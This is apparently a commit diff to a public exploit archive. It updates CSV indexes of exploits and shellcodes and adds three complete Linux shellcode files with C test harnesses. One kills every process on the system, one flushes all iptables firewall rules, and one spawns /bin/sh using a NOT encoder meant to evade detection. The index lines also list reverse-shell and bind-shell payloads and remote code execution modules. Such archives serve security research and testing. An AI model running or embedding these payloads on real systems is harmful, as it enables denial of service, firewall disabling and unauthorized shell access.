46484,exploits/linux/dos/46484.txt,"FileZilla 3.40.0 - 'Local search' / 'Local site' Denial of Service (PoC)",2019-03-04,"Mr Winst0n",dos,linux,
46439,exploits/linux/dos/46439.py,"Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)",2019-02-21,"Alejandra Sánchez",dos,linux,
46367,exploits/windows/dos/46367.py,"NetworkSleuth 3.0 - 'Name' Denial of Service (PoC)",2019-02-13,"Alejandra Sánchez",dos,windows,
46371,exploits/windows/dos/46371.py,"Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC)",2019-02-14,"Victor Mondragón",dos,windows,
@ -6338,6 +6340,7 @@ id,file,description,date,author,type,platform,port
46458,exploits/windows/dos/46458.py,"Xlight FTP Server 3.9.1 - Buffer Overflow (PoC)",2019-02-25,"Logan Whitmire",dos,windows,
46464,exploits/android/dos/46464.py,"FTP Server 1.32 - Denial of Service",2019-02-28,s4vitar,dos,android,
46465,exploits/linux/dos/46465.txt,"WebKitGTK 2.23.90 / WebKitGTK+ 2.22.6 - Denial of Service",2019-02-28,"Dhiraj Mishra",dos,linux,
46469,exploits/hardware/dos/46469.py,"Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow",2019-02-28,"Artem Metla",dos,hardware,
46470,exploits/windows/dos/46470.py,"TransMac 12.3 - Denial of Service (PoC)",2019-02-28,"Alejandra Sánchez",dos,windows,
46472,exploits/multiple/dos/46472.txt,"Google Chrome < M72 - PaymentRequest Service Use-After-Free",2019-03-01,"Google Security Research",dos,multiple,
46473,exploits/multiple/dos/46473.txt,"Google Chrome < M72 - RenderFrameHostImpl::CreateMediaStreamDispatcherHost Use-After-Free",2019-03-01,"Google Security Research",dos,multiple,
@ -10203,7 +10206,7 @@ id,file,description,date,author,type,platform,port
45378,exploits/windows_x86-64/local/45378.py,"InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH)",2018-09-11,"Luis Martínez",local,windows_x86-64,
45379,exploits/android/local/45379.txt,"Android - 'zygote->init;' Chain from USB Privilege Escalation",2018-09-11,"Google Security Research",local,android,
45395,exploits/windows_x86-64/local/45395.py,"InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH)",2018-09-13,"Luis Martínez",local,windows_x86-64,
45401,exploits/windows/local/45401.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation",2018-09-13,"Parvez Anwar",local,windows,
45401,exploits/windows/local/45401.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (1)",2018-09-13,"Parvez Anwar",local,windows,
45402,exploits/windows/local/45402.py,"Faleemi Desktop Software 1.8.2 - 'SavePath for ScreenShots' Buffer Overflow (SEH)",2018-09-13,"Gionathan Reale",local,windows,
45403,exploits/windows_x86/local/45403.py,"Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)",2018-09-13,"Gionathan Reale",local,windows_x86,
45406,exploits/windows/local/45406.py,"Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow",2018-09-13,ZwX,local,windows,
@ -10236,6 +10239,7 @@ id,file,description,date,author,type,platform,port
45626,exploits/windows/local/45626.rb,"VLC Media Player - MKV Use-After-Free (Metasploit)",2018-10-16,Metasploit,local,windows,
45627,exploits/windows_x86/local/45627.py,"Any Sound Recorder 2.93 - Buffer Overflow (SEH)",2018-10-17,"Abdullah Alıç",local,windows_x86,
45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux,
45496,exploits/windows/local/45496.c,"STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)",2019-03-04,"Ivan Ivanovic",local,windows,
45653,exploits/windows/local/45653.rb,"Microsoft Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows,
45660,exploits/windows/local/45660.py,"Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)",2018-10-22,"Fabien DROMAS",local,windows,
45675,exploits/windows/local/45675.md,"Microsoft Data Sharing - Local Privilege Escalation (PoC)",2018-10-23,SandboxEscaper,local,windows,
@ -27399,7 +27403,7 @@ id,file,description,date,author,type,platform,port
22030,exploits/php/webapps/22030.php,"vBulletin 2.0/2.2.x - 'memberlist.php' Cross-Site Scripting",2002-11-22,Sp.IC,webapps,php,
22037,exploits/php/webapps/22037.txt,"PHP-Nuke 5.x/6.0/6.5 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities",2002-11-25,"Matthew Murphy",webapps,php,
22038,exploits/php/webapps/22038.txt,"Sisfokol 4.0 - Arbitrary File Upload",2012-10-17,cr4wl3r,webapps,php,
22039,exploits/php/webapps/22039.txt,"symphony CMS 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,webapps,php,
22039,exploits/php/webapps/22039.txt,"Symphony CMS 2.3 - Multiple Vulnerabilities",2012-10-17,Wireghoul,webapps,php,
22040,exploits/jsp/webapps/22040.txt,"ManageEngine Support Center Plus 7908 - Multiple Vulnerabilities",2012-10-17,xistence,webapps,jsp,
22041,exploits/multiple/webapps/22041.txt,"Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities",2012-10-17,"SEC Consult",webapps,multiple,
22042,exploits/php/webapps/22042.php,"vBulletin 2.0.x/2.2.x - 'members2.php' Cross-Site Scripting",2002-11-25,Sp.IC,webapps,php,
@ -34987,7 +34991,7 @@ id,file,description,date,author,type,platform,port
34583,exploits/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80
34584,exploits/hardware/webapps/34584.txt,"TP-Link TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80
34585,exploits/php/webapps/34585.txt,"Atmail Webmail 7.2 - Multiple Vulnerabilities",2014-09-08,smash,webapps,php,443
34586,exploits/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",webapps,php,80
34586,exploits/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,Wireghoul,webapps,php,80
34587,exploits/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,webapps,multiple,8090
34589,exploits/php/webapps/34589.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 2.0 - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",webapps,php,
34593,exploits/php/webapps/34593.txt,"Parallels Plesk Sitebuilder 9.5 - Multiple Vulnerabilities",2014-09-09,alieye,webapps,php,
@ -40241,6 +40245,7 @@ id,file,description,date,author,type,platform,port
44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80
44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua,
46489,exploits/hardware/webapps/46489.txt,"Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution",2019-03-04,JameelNabbo,webapps,hardware,80
44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,8181
44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php,
44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php,
@ -40249,6 +40254,7 @@ id,file,description,date,author,type,platform,port
44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80
44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80
44988,exploits/php/webapps/44988.txt,"Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting",2018-07-09,"Ahmed Elhady Mohamed",webapps,php,
46488,exploits/php/webapps/46488.txt,"zzzphp CMS 1.6.1 - Cross-Site Request Forgery",2019-03-04,"Yang Chenglong",webapps,php,80
44996,exploits/multiple/webapps/44996.py,"Gitea 1.4.0 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,multiple,
44997,exploits/php/webapps/44997.txt,"WolfSight CMS 3.2 - SQL Injection",2018-07-10,"Berk Dusunur",webapps,php,80
44998,exploits/multiple/webapps/44998.py,"Oracle WebLogic 12.1.2.0 - RMI Registry UnicastRef Object Java Deserialization Remote Code Execution",2018-07-07,bobsecq,webapps,multiple,
@ -40436,6 +40442,7 @@ id,file,description,date,author,type,platform,port
45487,exploits/hardware/webapps/45487.txt,"RICOH MP 305+ Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware,
45490,exploits/hardware/webapps/45490.txt,"RICOH MP C406Z Printer - Cross-Site Scripting",2018-09-25,"Ismail Tasdelen",webapps,hardware,
45491,exploits/php/webapps/45491.txt,"Joomla! Component Responsive Portfolio 1.6.1 - 'filter_order_Dir' SQL Injection",2018-09-25,AkkuS,webapps,php,
46487,exploits/windows/webapps/46487.py,"Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)",2019-03-04,"Matteo Malvica",webapps,windows,8000
45498,exploits/windows/webapps/45498.txt,"iWay Data Quality Suite Web Console 10.6.1.ga - XML External Entity Injection",2018-09-27,"Sureshbabu Narvaneni",webapps,windows,
45499,exploits/java/webapps/45499.txt,"ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting",2018-09-27,"Ismail Tasdelen",webapps,java,
45500,exploits/windows_x86-64/webapps/45500.txt,"Rausoft ID.prove 2.95 - 'Username' SQL injection",2018-09-27,"Ilya Timchenko",webapps,windows_x86-64,
@ -40545,6 +40552,7 @@ id,file,description,date,author,type,platform,port
45699,exploits/php/webapps/45699.txt,"MPS Box 0.1.8.0 - Arbitrary File Upload",2018-10-26,"Ihsan Sencan",webapps,php,
45700,exploits/php/webapps/45700.txt,"Delta Sql 1.8.2 - 'id' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,
45701,exploits/php/webapps/45701.txt,"Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,
46486,exploits/php/webapps/46486.rb,"Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)",2019-03-04,AkkuS,webapps,php,80
45703,exploits/php/webapps/45703.txt,"Open Faculty Evaluation System 5.6 - 'batch_name' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,
45704,exploits/php/webapps/45704.txt,"Grapixel New Media 2 - 'pageref' SQL Injection",2018-10-29,"Berk Dusunur",webapps,php,
45706,exploits/aspx/webapps/45706.vb,"Library Management System 1.0 - 'frmListBooks' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,aspx,
@ -40848,6 +40856,7 @@ id,file,description,date,author,type,platform,port
46273,exploits/php/webapps/46273.txt,"MyBB IP History Logs Plugin 1.0.2 - Cross-Site Scripting",2019-01-28,0xB9,webapps,php,80
46274,exploits/php/webapps/46274.txt,"ResourceSpace 8.6 - 'collection_edit.php' SQL Injection",2019-01-28,dd_,webapps,php,80
46276,exploits/php/webapps/46276.txt,"PDF Signer 3.0 - Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie)",2019-01-29,dd_,webapps,php,80
46482,exploits/php/webapps/46482.txt,"OOP CMS BLOG 1.0 - Multiple SQL Injection",2019-03-04,"Mr Winst0n",webapps,php,80
46282,exploits/php/webapps/46282.txt,"Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection",2019-01-30,"Mehmet EMIROGLU",webapps,php,80
46305,exploits/windows/webapps/46305.txt,"SureMDM < 2018-11 Patch - Local / Remote File Inclusion",2019-02-01,"Digital Interruption",webapps,windows,80
40053,exploits/php/webapps/40053.py,"Tiki Wiki 15.1 - File Upload",2016-07-07,"Ivan Ivanovic",webapps,php,80
@ -40879,6 +40888,7 @@ id,file,description,date,author,type,platform,port
46352,exploits/linux/webapps/46352.rb,"Jenkins 2.150.2 - Remote Command Execution (Metasploit)",2019-02-12,AkkuS,webapps,linux,
46353,exploits/aspx/webapps/46353.cs,"BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution",2019-02-12,"Dustin Cobb",webapps,aspx,
46354,exploits/php/webapps/46354.txt,"LayerBB 1.1.2 - Cross-Site Scripting",2019-02-12,0xB9,webapps,php,80
46483,exploits/php/webapps/46483.txt,"OOP CMS BLOG 1.0 - Multiple Cross-Site Request Forgery",2019-03-04,"Mr Winst0n",webapps,php,80
46440,exploits/php/webapps/46440.txt,"EI-Tube 3 - SQL Injection",2019-02-21,"Meisam Monsef",webapps,php,80
46366,exploits/php/webapps/46366.txt,"Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting",2019-02-13,"Mehmet EMIROGLU",webapps,php,80
46368,exploits/php/webapps/46368.txt,"PilusCart 1.4.1 - 'send' SQL Injection",2019-02-13,"Mehmet EMIROGLU",webapps,php,80
@ -40930,3 +40940,10 @@ id,file,description,date,author,type,platform,port
46467,exploits/php/webapps/46467.txt,"Joomla! Component J2Store < 3.3.7 - SQL Injection",2019-02-28,"Andrei Conache",webapps,php,
46468,exploits/linux/webapps/46468.rb,"Usermin 1.750 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,linux,
46471,exploits/php/webapps/46471.rb,"Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,php,
46480,exploits/php/webapps/46480.txt,"CMSsite 1.0 - Multiple Cross-Site Request Forgery",2019-03-04,"Mr Winst0n",webapps,php,80
46481,exploits/php/webapps/46481.py,"elFinder 2.1.47 - Command Injection vulnerability in the PHP connector",2019-03-04,q3rv0,webapps,php,80
46494,exploits/windows/webapps/46494.py,"MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal",2019-03-04,0v3rride,webapps,windows,
46495,exploits/php/webapps/46495.txt,"Bolt CMS 3.6.4 - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80
46496,exploits/php/webapps/46496.txt,"Craft CMS 3.1.12 Pro - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80
46497,exploits/php/webapps/46497.txt,"WordPress Plugin Cerber Security_ Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities",2019-03-04,ed0x21son,webapps,php,80
46498,exploits/hardware/webapps/46498.txt,"Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting",2019-03-04,Tauco,webapps,hardware,80

Can't render this file because it is too large.

3
files_shellcodes.csv
View file

@ -843,6 +843,7 @@ id,file,description,date,author,type,platform
43954,shellcodes/linux_x86-64/43954.nasm,"Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode",2017-12-16,0x4ndr3,shellcode,linux_x86-64
43955,shellcodes/generator/43955.py,"Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)",2017-12-19,0x4ndr3,shellcode,generator
43956,shellcodes/linux_x86-64/43956.c,"Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode",2018-02-02,0x4ndr3,shellcode,linux_x86-64
46493,shellcodes/linux_x86/46493.c,"Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes)",2019-03-04,"Daniele Votta",shellcode,linux_x86
44143,shellcodes/arm/44143.s,"Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes)",2018-02-19,rtmcx,shellcode,arm
42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
@ -888,9 +889,11 @@ id,file,description,date,author,type,platform
44738,shellcodes/linux_x86/44738.c,"Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)",2018-05-24,"Nuno Freitas",shellcode,linux_x86
44740,shellcodes/linux_x86/44740.c,"Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)",2018-05-24,"Jonathan Crosby",shellcode,linux_x86
44791,shellcodes/linux_x86/44791.c,"Linux/x86 - Bind (5555/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2018-05-28,Luca,shellcode,linux_x86
46492,shellcodes/linux_x86-64/46492.c,"Linux/x64 - Kill All Processes Shellcode (11 bytes)",2019-03-04,"Aron Mihaljevic",shellcode,linux_x86-64
44807,shellcodes/linux_x86/44807.c,"Linux/x86 - Egghunter (0xdeadbeef) + access() + execve(/bin/sh) Shellcode (38 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm
46491,shellcodes/linux_x86/46491.c,"Linux/x86 - iptables -F Shellcode (43 bytes)",2019-03-04,"Cameron Brown",shellcode,linux_x86
44856,shellcodes/arm/44856.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes)",2018-06-08,rtmcx,shellcode,arm
44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86
44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86

1 id file description date author type platform
843 43954 shellcodes/linux_x86-64/43954.nasm Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode 2017-12-16 0x4ndr3 shellcode linux_x86-64
844 43955 shellcodes/generator/43955.py Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator) 2017-12-19 0x4ndr3 shellcode generator
845 43956 shellcodes/linux_x86-64/43956.c Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode 2018-02-02 0x4ndr3 shellcode linux_x86-64
846 46493 shellcodes/linux_x86/46493.c Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes) 2019-03-04 Daniele Votta shellcode linux_x86
847 44143 shellcodes/arm/44143.s Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IP Controlled (192.168.1.190) + Null-Free Shellcode (168 bytes) 2018-02-19 rtmcx shellcode arm
848 42295 shellcodes/linux_x86/42295.c Linux/x86 - Reverse (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
849 41723 shellcodes/linux_x86/41723.c Linux/x86 - Reverse (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes) 2017-03-24 JR0ch17 shellcode linux_x86
889 44738 shellcodes/linux_x86/44738.c Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes) 2018-05-24 Nuno Freitas shellcode linux_x86
890 44740 shellcodes/linux_x86/44740.c Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes) 2018-05-24 Jonathan Crosby shellcode linux_x86
891 44791 shellcodes/linux_x86/44791.c Linux/x86 - Bind (5555/TCP) Shell (/bin/sh) Shellcode (98 bytes) 2018-05-28 Luca shellcode linux_x86
892 46492 shellcodes/linux_x86-64/46492.c Linux/x64 - Kill All Processes Shellcode (11 bytes) 2019-03-04 Aron Mihaljevic shellcode linux_x86-64
893 44807 shellcodes/linux_x86/44807.c Linux/x86 - Egghunter (0xdeadbeef) + access() + execve(/bin/sh) Shellcode (38 bytes) 2018-05-31 Paolo Perego shellcode linux_x86
894 44808 shellcodes/linux_x86/44808.c Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes) 2018-05-31 Paolo Perego shellcode linux_x86
895 44811 shellcodes/arm/44811.c Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes) 2018-05-31 Ken Kitahara shellcode arm
896 46491 shellcodes/linux_x86/46491.c Linux/x86 - iptables -F Shellcode (43 bytes) 2019-03-04 Cameron Brown shellcode linux_x86
897 44856 shellcodes/arm/44856.c Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes) 2018-06-08 rtmcx shellcode arm
898 44963 shellcodes/linux_x86/44963.c Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes) 2018-07-02 Anurag Srivastava shellcode linux_x86
899 44990 shellcodes/linux_x86/44990.c Linux/x86 - Kill Process Shellcode (20 bytes) 2018-07-09 Nathu Nandwani shellcode linux_x86

64
shellcodes/linux_x86-64/46492.c Normal file
View file

@ -0,0 +1,64 @@
/*
;Title: Linux/x86_64 - KILL_ALL
;Author: Aron Mihaljevic
;Architecture: Linux x86_64
;Shellcode Length: 11 bytes
========DESCTIPTION===========================
#include <sys/types.h>
#include <signal.h>
int kill(pid_t pid, int sig);
===COMPILATION AND EXECUTION==================
#nasm -f elf64 kill.nasm -o kill.o
#ld kill.o -o kill
=================SHELLCODE================
global _start
section .text
_start:
push 0x3e ; sys kill
pop rax
push -1 ; pid
pop rdi
push 0x9 ; sig kill
pop rsi
syscall
====================FOR C Compile===========================
# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x6a\x3e\x58\x6a\xff\x5f\x6a\x09\x5e\x0f\x05";
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

55
shellcodes/linux_x86/46491.c Normal file
View file

@ -0,0 +1,55 @@
/**********************************************/
/* linux/x86 iptables -F Length: 43 bytes */
/* */
/* 03/01/2019 */
/* */
/* Author: Cameron Brown */
/* */
/* Email: pwoerTF@gmail.com */
/**********************************************/
global _start
section .text
_start:
jmp short get
code:
pop ebx
cdq
mov [ebx+0xe], dl
lea eax, [ebx+0xf]
push edx
push eax
push ebx
mov ecx, esp
mov eax, edx
mov al, 0xb
int 0x80
get:
call code
file: db "/sbin/iptables#-F"
--------------------------------------------------
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x13\x5b\x99\x88\x53\x0e\x8d\x43\x0f\x52\x50\x53\x89\xe1\x89\xd0\xb0\x0b\xcd\x80\xe8\xe8\xff\xff\xff\x2f\x73\x62\x69\x6e\x2f\x69\x70\x74\x61\x62\x6c\x65\x73\x23\x2d\x46";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

99
shellcodes/linux_x86/46493.c Normal file
View file

@ -0,0 +1,99 @@
/*
; Date: 02/03/2019
; NOT-Encoder.py
; Author: Daniele Votta
; Description: This program encode shellcode with NOT technique.
; Tested on: i686 GNU/Linux
; Shellcode Length:25
#!/usr/bin/python
# Python NOT Encoder
# Execve /bin/sh
shellcode =("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
encoded2 = ""
print 'Encoded shellcode...'
for x in bytearray(shellcode):
# NOT Encoding
y = ~x
encoded += '\\x'
encoded += '%02x' % (y & 0xff)
encoded2 += '0x'
encoded2 += '%02x,' % (y & 0xff)
print encoded +"\n"
print encoded2
print 'Len: %d' % len(bytearray(shellcode))
*/
#include<stdio.h>
#include<string.h>
/*
; NOT-Decoder.asm
; Author: Daniele Votta
; Description: This program decode shellcode with NOT technique.
; Tested on: i686 GNU/Linux
; Shellcode Length:44
; JMP | CALL | POP | Techniques
NOT-Decoder: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: eb 0c jmp 804808e <call_decoder>
08048082 <decoder>:
8048082: 5e pop esi
8048083: 31 c9 xor ecx,ecx
8048085: b1 19 mov cl,0x19
08048087 <decode>:
8048087: f6 16 not BYTE PTR [esi]
8048089: 46 inc esi
804808a: e2 fb loop 8048087 <decode>
804808c: eb 05 jmp 8048093 <EncodedShellcode>
0804808e <call_decoder>:
804808e: e8 ef ff ff ff call 8048082 <decoder>
08048093 <EncodedShellcode>:
8048093: ce into
8048094: 3f aas
8048095: af scas eax,DWORD PTR es:[edi]
8048096: 97 xchg edi,eax
8048097: d0 d0 rcl al,1
8048099: 8c 97 97 d0 9d 96 mov WORD PTR [edi-0x69622f69],ss
804809f: 91 xchg ecx,eax
80480a0: 76 1c jbe 80480be <__bss_start+0x12>
80480a2: af scas eax,DWORD PTR es:[edi]
80480a3: 76 1d jbe 80480c2 <__bss_start+0x16>
80480a5: ac lods al,BYTE PTR ds:[esi]
80480a6: 76 1e jbe 80480c6 <__bss_start+0x1a>
80480a8: 4f dec edi
80480a9: f4 hlt
80480aa: 32 .byte 0x32
80480ab: 7f .byte 0x7f
[+] Extract Shellcode ...
"\xeb\x0c\x5e\x31\xc9\xb1\x19\xf6\x16\x46\xe2\xfb\xeb\x05\xe8\xef\xff\xff\xff\xce\x3f\xaf\x97\xd0\xd0\x8c\x97\x97\xd0\x9d\x96\x91\x76\x1c\xaf\x76\x1d\xac\x76\x1e\x4f\xf4\x32\x7f"
======================= POC Daniele Votta =======================
*/
/* NOT Encoded Execve /bin/sh */
unsigned char code[] = \
"\xeb\x0c\x5e\x31\xc9\xb1\x19\xf6\x16\x46\xe2\xfb\xeb\x05\xe8\xef\xff\xff\xff\xce\x3f\xaf\x97\xd0\xd0\x8c\x97\x97\xd0\x9d\x96\x91\x76\x1c\xaf\x76\x1d\xac\x76\x1e\x4f\xf4\x32\x7f";
int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}